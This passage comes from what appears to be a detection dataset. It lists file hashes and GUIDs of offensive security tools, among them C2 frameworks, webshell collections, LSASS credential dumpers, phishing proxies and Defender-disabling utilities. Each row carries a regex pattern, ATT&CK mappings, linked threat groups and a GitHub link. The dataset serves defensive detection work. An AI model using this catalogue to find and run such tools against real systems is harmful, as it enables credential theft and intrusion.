- T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27057" "*578bd74856cec7caa02f5f6c53d9412e06bc7eefd6c5213ee8f767a91d88c4c9*",".{0,1000}578bd74856cec7caa02f5f6c53d9412e06bc7eefd6c5213ee8f767a91d88c4c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27058" "*5791ebb3782d4210dcd5e16ca5f8e16d30582b73f87fc848735a09374190d010*",".{0,1000}5791ebb3782d4210dcd5e16ca5f8e16d30582b73f87fc848735a09374190d010.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27059" "*579a0817c99aa25f8bce0b453da2bb65c622a51c2d702512899a244d675f3305*",".{0,1000}579a0817c99aa25f8bce0b453da2bb65c622a51c2d702512899a244d675f3305.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs 
network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27061" "*579ba94b0bffde7e8308bae8f7ba129e47f7e36a3ed7e57ce0454d01629c2baa*",".{0,1000}579ba94b0bffde7e8308bae8f7ba129e47f7e36a3ed7e57ce0454d01629c2baa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27062" "*579e0f946f0d165567b7a8e933b6000368480ce09d51042e8753e4b389318dbc*",".{0,1000}579e0f946f0d165567b7a8e933b6000368480ce09d51042e8753e4b389318dbc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27063" "*57a0a978ab19598abf7185762834fef1b4dbd4db30d2fb85d411a0e22821df25*",".{0,1000}57a0a978ab19598abf7185762834fef1b4dbd4db30d2fb85d411a0e22821df25.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & 
Spoofing","https://github.com/fkasler/cuddlephish","1","0","#filehash","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","27064" "*57a36d59b199ee6176b1bdf951cac5e4dcd3895a0e5307706b12b527c0cce9b3*",".{0,1000}57a36d59b199ee6176b1bdf951cac5e4dcd3895a0e5307706b12b527c0cce9b3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27065" "*57A893C7-7527-4B55-B4E9-D644BBDA89D1*",".{0,1000}57A893C7\-7527\-4B55\-B4E9\-D644BBDA89D1.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","#GUIDproject","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","27066" "*57bdf28c39480b3e91fd8e433dce4c9f032447f9bf1947a7b8362645ad213732*",".{0,1000}57bdf28c39480b3e91fd8e433dce4c9f032447f9bf1947a7b8362645ad213732.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27068" "*57c1670e15a47e02637545cc4a3ad421000a98279df961fc6d454a5c0271421e*",".{0,1000}57c1670e15a47e02637545cc4a3ad421000a98279df961fc6d454a5c0271421e.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","#filehash","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","27069" "*57c646df3c07792d9c6e479b7faa5ccd7802dc03dc49e477534e2322cb753bf9*",".{0,1000}57c646df3c07792d9c6e479b7faa5ccd7802dc03dc49e477534e2322cb753bf9.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","0","#filehash","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z","27070" "*57c7c32de040ad8525da2c58585fe1c0e7bfd848b81308015a055e81d8cb5492*",".{0,1000}57c7c32de040ad8525da2c58585fe1c0e7bfd848b81308015a055e81d8cb5492.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#filehash","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","27071" "*57cc2a0322016a734d1ff1718bca7f1deb0df3309eeac2222d663b48da7dfc65*",".{0,1000}57cc2a0322016a734d1ff1718bca7f1deb0df3309eeac2222d663b48da7dfc65.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27072" "*57d4776f876ce736a4fc01476dfc2bb04672edbd7a5f52886a3b11528cfc23fb*",".{0,1000}57d4776f876ce736a4fc01476dfc2bb04672edbd7a5f52886a3b11528cfc23fb.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27074" "*57D4D4F4-F083-47A3-AE33-AE2500ABA3B6*",".{0,1000}57D4D4F4\-F083\-47A3\-AE33\-AE2500ABA3B6.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","#GUIDproject","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","27075" "*57d785125cf62ffdb727ac7f56110dc0ab0403f033caf958b717fc93f963f097*",".{0,1000}57d785125cf62ffdb727ac7f56110dc0ab0403f033caf958b717fc93f963f097.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","27076" "*57dbbf5283ae35badf6a08c683f767a44c9efdde9623c0fa6429d8672c97a18e*",".{0,1000}57dbbf5283ae35badf6a08c683f767a44c9efdde9623c0fa6429d8672c97a18e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27077" "*57ea373248f438fc9138d17c018defcbf8668884f234d451da112fd544667d83*",".{0,1000}57ea373248f438fc9138d17c018defcbf8668884f234d451da112fd544667d83.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27078" "*57eda2366c187ce90c39a4710ff1fe62a7d667d25bf9ba63dbe34bf44b0ff684*",".{0,1000}57eda2366c187ce90c39a4710ff1fe62a7d667d25bf9ba63dbe34bf44b0ff684.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","27080" "*57ef38c793bc416b93685ed0d2b44971860a2026a7dd9eff7dd2cd5cc6630120*",".{0,1000}57ef38c793bc416b93685ed0d2b44971860a2026a7dd9eff7dd2cd5cc6630120.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27081" "*57f5a53203d19daa9bb094b442bc029a374686af5be71741e5536e35590e9f9c*",".{0,1000}57f5a53203d19daa9bb094b442bc029a374686af5be71741e5536e35590e9f9c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27083" "*57fc37bfab5489b2ace66257d03b23a098ddc80d25b22540e0e5745becc4dbad*",".{0,1000}57fc37bfab5489b2ace66257d03b23a098ddc80d25b22540e0e5745becc4dbad.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","27084" "*57FD94EC-4361-43FD-AB9D-CDB254C0DE8F*",".{0,1000}57FD94EC\-4361\-43FD\-AB9D\-CDB254C0DE8F.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#GUIDproject","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","27085" "*5804dab3b58ddd2e4e2a198083e43b3f1759056d33e03d3a26a5c5fc4ce5a5f9*",".{0,1000}5804dab3b58ddd2e4e2a198083e43b3f1759056d33e03d3a26a5c5fc4ce5a5f9.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27086" "*580ba177-cf9a-458c-a692-36dd6f23ea77*",".{0,1000}580ba177\-cf9a\-458c\-a692\-36dd6f23ea77.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#GUIDproject","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","27088" "*580bfa0e4cbe1fd71f578f3daafcd0d869e0bc29adc849e12d0148b8cc016745*",".{0,1000}580bfa0e4cbe1fd71f578f3daafcd0d869e0bc29adc849e12d0148b8cc016745.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27089" "*580ec64c62709841ca04ba73473f1e8681fde57ebbbbb81d1fe12b075b263057*",".{0,1000}580ec64c62709841ca04ba73473f1e8681fde57ebbbbb81d1fe12b075b263057.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","27090" "*581100a0d03b60437fe963681f102ab80b89c6392007da57f54162ceeb4c5378*",".{0,1000}581100a0d03b60437fe963681f102ab80b89c6392007da57f54162ceeb4c5378.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27091" "*5822804140e537314665856c9453da3cd786ff9383997e2b9b5d313d32efa0d7*",".{0,1000}5822804140e537314665856c9453da3cd786ff9383997e2b9b5d313d32efa0d7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27094" "*582524e066107d16e7e3c95046112a8511167405fdf6e8f92f8352d3653e61c4*",".{0,1000}582524e066107d16e7e3c95046112a8511167405fdf6e8f92f8352d3653e61c4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27095" "*58297eb7cad8589399f7b0bc92d61c144ee05786dfc06f527826965ae4062f99*",".{0,1000}58297eb7cad8589399f7b0bc92d61c144ee05786dfc06f527826965ae4062f99.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","27097" "*583071fcb65b20e8164eb23a66e2147d7e7621bc944cbae675914cf23de98a6d*",".{0,1000}583071fcb65b20e8164eb23a66e2147d7e7621bc944cbae675914cf23de98a6d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27100" "*58338E42-6010-493C-B8C8-2FD2CFC30FFB*",".{0,1000}58338E42\-6010\-493C\-B8C8\-2FD2CFC30FFB.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential 
Access","https://github.com/CCob/MirrorDump","1","0","#GUIDproject","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","27101" "*583409661e2afdf55553b7da2e510aef9cd10c542d98ebc4ee1962d1d4472bc1*",".{0,1000}583409661e2afdf55553b7da2e510aef9cd10c542d98ebc4ee1962d1d4472bc1.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","#filehash","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","27102" "*58359209e215a9fc0dafd14039121398559790dba9aa2398c457348ee1cb8a4d*",".{0,1000}58359209e215a9fc0dafd14039121398559790dba9aa2398c457348ee1cb8a4d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27103" "*58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee*",".{0,1000}58482e19d6376bbe0120289b6d39a35de15b68d00713f821ab0c7f28f85a31ee.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - 
T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","#filehash","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","27104" "*584ed22563bcc356a615c44d376bb194cea96dd028f15f58b5f412bbd26008e8*",".{0,1000}584ed22563bcc356a615c44d376bb194cea96dd028f15f58b5f412bbd26008e8.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","27105" "*5851121b0a7ef7c0b740d9b7912f6676317ebc41918187b3c4b7894842a0d3d4*",".{0,1000}5851121b0a7ef7c0b740d9b7912f6676317ebc41918187b3c4b7894842a0d3d4.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27106" "*5859e420b588764f0d8d5e301439af524ef486d1d39b0a189d93546cacf51d7d*",".{0,1000}5859e420b588764f0d8d5e301439af524ef486d1d39b0a189d93546cacf51d7d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27110" 
"*585b1fd21dc719ef6cf74465e417e774dd3838e2cbf4e985da3f647fdc9674dc*",".{0,1000}585b1fd21dc719ef6cf74465e417e774dd3838e2cbf4e985da3f647fdc9674dc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27111" "*585e550d0435ab335e6c7fdfb7a609b7b8ead766fc3ee7ef1f93113b1d51e5d3*",".{0,1000}585e550d0435ab335e6c7fdfb7a609b7b8ead766fc3ee7ef1f93113b1d51e5d3.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","27112" "*5863244576fb755560b02f19192a13ce331de82e3fcea5b60509966da90239b5*",".{0,1000}5863244576fb755560b02f19192a13ce331de82e3fcea5b60509966da90239b5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27114" "*5866ad6e1eb1d3c5481179c4eae84fc733fca93782827f08b8e980dd455f8e1d*",".{0,1000}5866ad6e1eb1d3c5481179c4eae84fc733fca93782827f08b8e980dd455f8e1d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27117" "*58716a4f8ccd77613cef3c7872810b38550875b18b06677e7b9d7c8ae7e1d30c*",".{0,1000}58716a4f8ccd77613cef3c7872810b38550875b18b06677e7b9d7c8ae7e1d30c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27119" "*5872afc30ecad98baad85351941c0f0d573fed08d224d038138b7dac77ba6ea1*",".{0,1000}5872afc30ecad98baad85351941c0f0d573fed08d224d038138b7dac77ba6ea1.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","27120" "*588158f3c721315eb00b31b4b1d2726f11ff6bef9d67ea98f3dc79f9a3c4159b*",".{0,1000}588158f3c721315eb00b31b4b1d2726f11ff6bef9d67ea98f3dc79f9a3c4159b.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27122" "*588a7a102ff2c2efc1c0b45e7ac717158e4f78ea4475a5e314cd23c6f08bc794*",".{0,1000}588a7a102ff2c2efc1c0b45e7ac717158e4f78ea4475a5e314cd23c6f08bc794.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#filehash","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","27124" "*588ab29a14df0313167d12053095f2959f0f7e28206a60f3e5c86cc939c0d89b*",".{0,1000}588ab29a14df0313167d12053095f2959f0f7e28206a60f3e5c86cc939c0d89b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
